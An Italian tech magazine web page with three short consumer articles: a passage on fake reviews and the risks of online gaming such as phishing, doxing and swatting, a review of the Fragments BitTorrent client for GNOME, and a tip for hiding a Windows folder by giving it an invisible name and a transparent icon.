Come? Semplicemente, vedere quante recensioni ha quell’account in quel portale e, soprattutto, se racconta degli episodi specifici e non va troppo nel vago. Se, infatti, dovesse essere molto generale, probabilmente si è di fronte a una recensione che è stata pilotata. Quindi, prestare la massima attenzione su ciò deve essere un must da non mettere in secondo piano. Certo, magari alcune app possono anche rallentare la memoria del CPU, fondamentale per il suo funzionamento, ma la sicurezza va messa al primo posto.

Quali sono i rischi di giocare online

Giocare online stimola la mente e crea aspettative elevate in termini di soddisfazione e patrimonio personale. Ma anche qui bisogna stare ben attenti a dove e come si gioca.

I pericoli sono dietro l’angolo. Il tema del phishing, ad esempio, è piuttosto ricorrente e si annovera nell’alveo delle truffe più comuni in circolazione, soprattutto tra le persone di età più avanzata. Basta una chat per entrare nella trappola dei cybercriminali e vedersi privati dei propri dati personali. Tutto ciò avviene attraverso un collegamento via chat, magari durante il gioco, che successivamente rimanda ad una mail dall’intento malfattore. Mai aprirla.

C’è il rischio ulteriore di andare incontro ad un furto d’identità. La funzione delle chat durante il gioco è stimolante, ma allo stesso tempo può divenire pericolosa se affrontata nel modo sbagliato.

Potrebbero facilmente introdursi all’interno di suddette chat persone malintenzionate con l’obiettivo di raccogliere informazioni sensibili. Inutile dire che bisogna prestare attenzione massima a questo tipo di pratica.

Emergono sotto questo profilo altri fenomeni, ancora più gravi, come doxing e swatting. In questi casi si arriva persino a divulgare online informazioni sensibili di una persona come nome, indirizzo di residenza e luogo di lavoro, mettendo a repentaglio, in casi estremi, la sua incolumità. Il tutto, naturalmente, senza alcuna autorizzazione da parte della vittima.

L’esposizione mediatica non fa altro che aggravare la posizione delle vittime, per l’appunto. Giocare online, da questo punto di vista, può portare a relazionarsi in maniera aperta, talvolta con persone sconosciute, di cui si sa poco o nulla. Dietro queste presenze virtuali può nascondersi sempre qualche presenza oscura, pronta a colpire quando meno lo si aspetti.

Foto di Aidan Howe da Pixabay


Hai trovato questo articolo interessante? Seguici su Facebook , Twitter, Mastodon

Continua a Leggere

Articoli

I migliori Open Source: Fragments

Un client BitTorrent che offre una gestione dei torrent semplice ma efficiente e utilizza il backend di Transmission

Avatar

Pubblicato

il

Nel panorama in continua evoluzione delle app di condivisione file, gli utenti GNOME hanno a disposizione Fragments, un client BitTorrent moderno progettato specificamente per il loro ambiente desktop. L’applicazione offre una gestione dei torrent semplice e intuitiva, integrandosi perfettamente con il design e l’estetica di GNOME grazie all’uso di GTK4 e libadwaita. Nonostante l’approccio minimalista, Fragments offre tutte le funzionalità essenziali come il controllo delle velocità di download, la gestione delle connessioni peer e le impostazioni di crittografia, sfruttando il robusto daemon di Transmission come backend.

Un client BitTorrent che offre una gestione dei torrent semplice ma efficiente e utilizza il backend di Transmission

 

Una sua caratteristica distintiva è la possibilità di controllare da remoto sia le proprie sessioni sia quelle di Transmission su altri dispositivi. L’interfaccia pulita permette di visualizzare una panoramica dei torrent, programmare l’ordine dei download e gestire i singoli file all’interno di un torrent. Una sezione delle statistiche completa fornisce informazioni in tempo reale sulle velocità di rete, sullo stato dei torrent e sui dati di utilizzo. Si può anche avere una panoramica di tutti i torrent raggruppati per stato. Il client supporta, infine, la cancellazione automatica dei file .torrent dopo l’aggiunta al client e il rilevamento intelligente della rete, che interrompe i download quando viene rilevata una connessione a consumo. Fragments è facilmente installabile tramite Flathub, garantendo compatibilità con diverse distribuzioni. Sebbene manchi di alcune funzionalità avanzate presenti in altri prodotti, come la limitazione della larghezza di banda, Fragments si distingue per la sua semplicità e integrazione profonda con GNOME, rendendolo ideale per chi cerca un client torrent leggero, pratico e user-friendly.

Puoi scaricare il cient da questo link.

 

 

Leggi anche: “I migliori software Open Source: Haruna:”


Hai trovato questo articolo interessante? Seguici su Facebook , Twitter, Mastodon

Continua a Leggere

Articoli

Nascondi i tuoi file da occhi indiscreti

Se il tuo computer è condiviso con altre persone, allora vale la pena creare una cartella nascosta dove conservare file e documenti importanti. Vediamo come fare in Windows

Avatar

Pubblicato

il

Il PC di casa è un po’ la nostra stanza dei segreti: un posto in cui mettiamo i documenti importanti ma anche le cose private e intime che vogliamo tenere lontane da persone curiose. Purtroppo, soprattutto se la famiglia è numerosa e non ci sono soldi per acquistare più computer, la nostra stanza segreta diventa una stanza “condivisa”. E allora addio privacy e possibilità di avere uno spazio tutto per noi.

Ma come sempre: mai dire mai!

Se stai cercando un metodo veloce per nascondere appunti, foto e documenti importanti su Windows, abbiamo la soluzione che fa al caso tuo! L’aiuto questa volta ci arriva dai caratteri invisibili, con i quali puoi creare cartelle nascoste senza installare alcun software aggiuntivo. Si tratta di una soluzione ingegnosa per mantenere privati i nostri file sensibili. La tecnica che andremo a descrivere sfrutta i caratteri ASCII invisibili. Il codice ASCII (American Standard Code for Information Interchange) è uno standard per la codifica di caratteri testuali in computer e dispositivi di comunicazione. Include lettere, numeri, simboli e alcuni caratteri di controllo. Tra questi, alcuni sono “invisibili” perché non producono un simbolo visibile quando digitati, come lo spazio (Alt+0160), che non lascia traccia visibile nel nome della cartella. Utilizzando questi caratteri nel nome di una cartella, possiamo renderla praticamente invisibile agli occhi degli utenti comuni. Nei passi seguenti vedremo come fare.

 

Creiamo una cartella
Per iniziare, posizioniamo il puntatore del mouse in un punto vuoto del desktop di Windows 10. Clicchiamo con il tasto destro e dal menu contestuale che verrà aperto, spostiamo il puntatore del mouse sulla voce Nuovo e dalla schermata successiva scegliamo la voce Cartella.

 

Digitiamo il numero magico
Adesso, anziché dare un nome alla nuova cartella, eliminiamo la scritta presente e sempre rimanendo all’interno del campo rinomina, teniamo premuto il tasto Alt e digitiamo il numero 255 con il tastierino numerico della tastiera (quello quadrato a destra). Al termine premiamo Invio.

Icona, ma trasparente
Clicchiamo con il tasto destro del mouse sulla cartella e poi su Proprietà. Scegliamo Personalizza e poi Cambia icona. Individuiamo l’icona trasparente e selezioniamola. Clicchiamo su OK per confermare la scelta. A questo punto la cartella sarà invisibile sul desktop!

 

Leggi anche: “Scritte ASCII in un secondo

 

*illustrazione articolo progettata da Freepik


Hai trovato questo articolo interessante? Seguici su Facebook , Twitter, Mastodon

Continua a Leggere

Trending